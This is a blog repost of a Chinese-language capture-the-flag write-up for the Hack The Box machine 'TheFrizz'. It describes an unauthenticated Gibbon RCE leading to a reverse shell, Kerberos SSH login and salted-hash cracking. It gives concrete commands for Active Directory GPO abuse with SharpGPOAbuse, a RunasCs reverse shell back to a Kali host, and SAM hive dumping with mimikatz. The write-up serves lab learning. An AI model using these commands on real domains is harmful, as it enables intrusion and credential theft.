HTB_TheFrizz

福建二哥

HTB_TheFrizz

windows(insane)

总结

user.txt

gibbon的一个未授权rce CVE-2023-45878->反弹shell->config.php获取密码->kerberos登录ssh->f.frizzle


1.我当时反弹shell不成功,powershell -e不识别,nc的话必须结束掉才能回显内容,用了msf才可以

2.ssh的kerberos登录用法

export ....cache;ssh -o PreferredAuthentications=gssapi-with-mic \
    -o GSSAPIAuthentication=yes \
    f.frizzle@frizzdc.frizz.htb

3.加盐的sha256爆破

1410    sha256($pass.$salt)
1420    sha256($salt.$pass)


root.txt

mysql数据库messager数据信息,提到删除了,想办法恢复,想到$RECYCLE-(可能是回收站没清空)>kali下载文件,分析得到密码->ssh登录M.SchoolBus->洪范配合GPO滥用提权

a52c33a2e4b5f571840c43c7dd74e61d_640_wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1.webp

 

唯一能产生联系的就是这个WriteGPLink这个OUCLASS_FRIZZ,而它又包含v.frizzle,通过查看管理员命令可以知道v.frizzle是管理员

所以我可以进行关联,只需要找到/新建一个GPO(Domain Controllers OU)可能是权限够大,链接到CLASS_FRIZZ上即可

根据wp

 

 

$gpo = New-GPO -Name "EvilPolicy"
New-GPLink -Name "EvilPolicy" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
New-GPLink -Name "EvilPolicy" -Target "OU=CLASS_FRIZZ,DC=frizz,DC=htb"

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount "M.SchoolBus" --GPOName "EvilPolicy"
gpupdate /force
net localgroup Administrators


 

本地的话还不可以读root,新开shell的话ssh登不进去了

想到RunasCs反弹shell

 

./RunasCs.exe M.SchoolBus '?' powershell.exe -r kali_ip:3434

嘶,whoami的话名字没变化呢,但其实可以访问root.txt了,注意反弹时不要 -l --remote参数了,否则好像还是读不了

 


 想到


 

好吧,frizzdc.frizz.htb应该就是域控?毕竟含了个dc,与之前的DC01只是名字不同

 

nltest /dclist:frizz.htb
Get list of DCs in domain 'frizz.htb' from '\\frizzdc.frizz.htb'.
    frizzdc.frizz.htb [PDC]  [DS] Site: Default-First-Site-Name
The command completed successfully```

 

1.为什么 显示的是 $RECYCLE.BIN,无法cd进去,反而要$Recycle.Bin

dir -h显示的就是大写,说只是显示成了一个友好名称什么的,和什么机制有关系,和实际文件系统路径不太一样

 cp C:\$"Recycle.Bin"\S-1-\$"R???".7z \tem\1.7z

2.SharpGPOAbuse无回显

编译的问题?

https://github.com/FSecureLABS/SharpGPOAbuse

在本机windows使用下发现会报错

重新用VS2019编译生成,出现

\Fody.targets(38,12): error MSB4086: 尝试在条件“($(MsBuildMajorVersion) < 16)”中对计算结果为“”而不是数字的“$(MsBuildMajorVersion)”进行数值比较。

右键项目属性->目标框架是由3.5换成4.5,之后右键项目,生成Release的即可

可能是之前杀毒报错,把关键东西删除了,导致编译后不能用

后面使用

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount "M.SchoolBus" --GPOName "Default Domain Controllers Policy" 

Access to the path '\\frizz.htb\SysVol\frizz.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf' is denied.[!] Exiting...

发现拒绝了

那只能再洪范分析下了

3.evil-winrm错误

Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired
malloc(): unaligned fastbin chunk detected 

可能是winrm服务没开


SAM表获取hash

 


reg save HKLM\SYSTEM SYSTEM

reg save HKLM\SAM SAM

#使用mimikatz提取hash

lsadump::sam /sam:SAM /system:SYSTEM

 


https://www.cnblogs.com/-mo-/p/11890232.html

参考

 

wp

https://4xura.com/ctf/htb/htb-writeup-thefrizz

 

CVE-2023-34598

https://github.com/maddsec/CVE-2023-34598

cve

https://app.opencve.io/cve/?vendor=gibbonedu

CVE-2023-45878

https://herolab.usd.de/security-advisories/usd-2023-0025/

源码

https://github.com/GibbonEdu/core/tree/v25.0.00

kerbrute

https://github.com/ropnop/kerbrute

$RECYCLE.BIN

https://github.com/abelcheung/rifiuti2/releases/download/0.8.1/rifiuti2-0.8.1-win64.zip

这个貌似是可以看删除前的名字和位置的,但不使用这个也没事

SharpGPOAbuse

https://github.com/FSecureLABS/SharpGPOAbuse

 

 

RunasCs

https://github.com/antonioCoco/RunasCs

 



免责声明:本文来自羽泪云小栈,不代表福建二哥的观点和立场,如有侵权请联系本平台处理。

相关阅读

  • 根据 Microsoft 发布的一项产品公告,该公司计划从本月底开始,在运行 Windows 10 和 11 系统的 Microsoft 365 以及 Microsoft Office 2024 中逐
  • PyPI 恶意包对 MEXC 交易 API 发动攻击,订单重定向与凭证失窃风险骤升
  • CVE-2024-56406:Perl 堆溢出漏洞或引发拒绝服务与代码执行危机
  • Foxmail for Windows远程代码执行漏洞安全风险通告
  • 警惕!攻击者利用 SourceForge 软件托管平台传播恶意软件
  • HTB_TheFrizz
  • 路由器安全研究:D-Link DIR-823G v1.02 B05 复现与利用思路
  • ApoorvCTF Rust语言逆向实战

    • 发表评论

    快捷回复: 表情:
    AddoilApplauseBadlaughBombCoffeeFabulousFacepalmFecesFrownHeyhaInsidiousKeepFightingNoProbPigHeadShockedSinistersmileSlapSocialSweatTolaughWatermelonWittyWowYeahYellowdog
    评论列表 (暂无评论,228人围观)

    还没有评论,来说两句吧...

    取消
    微信二维码
    微信二维码
    支付宝二维码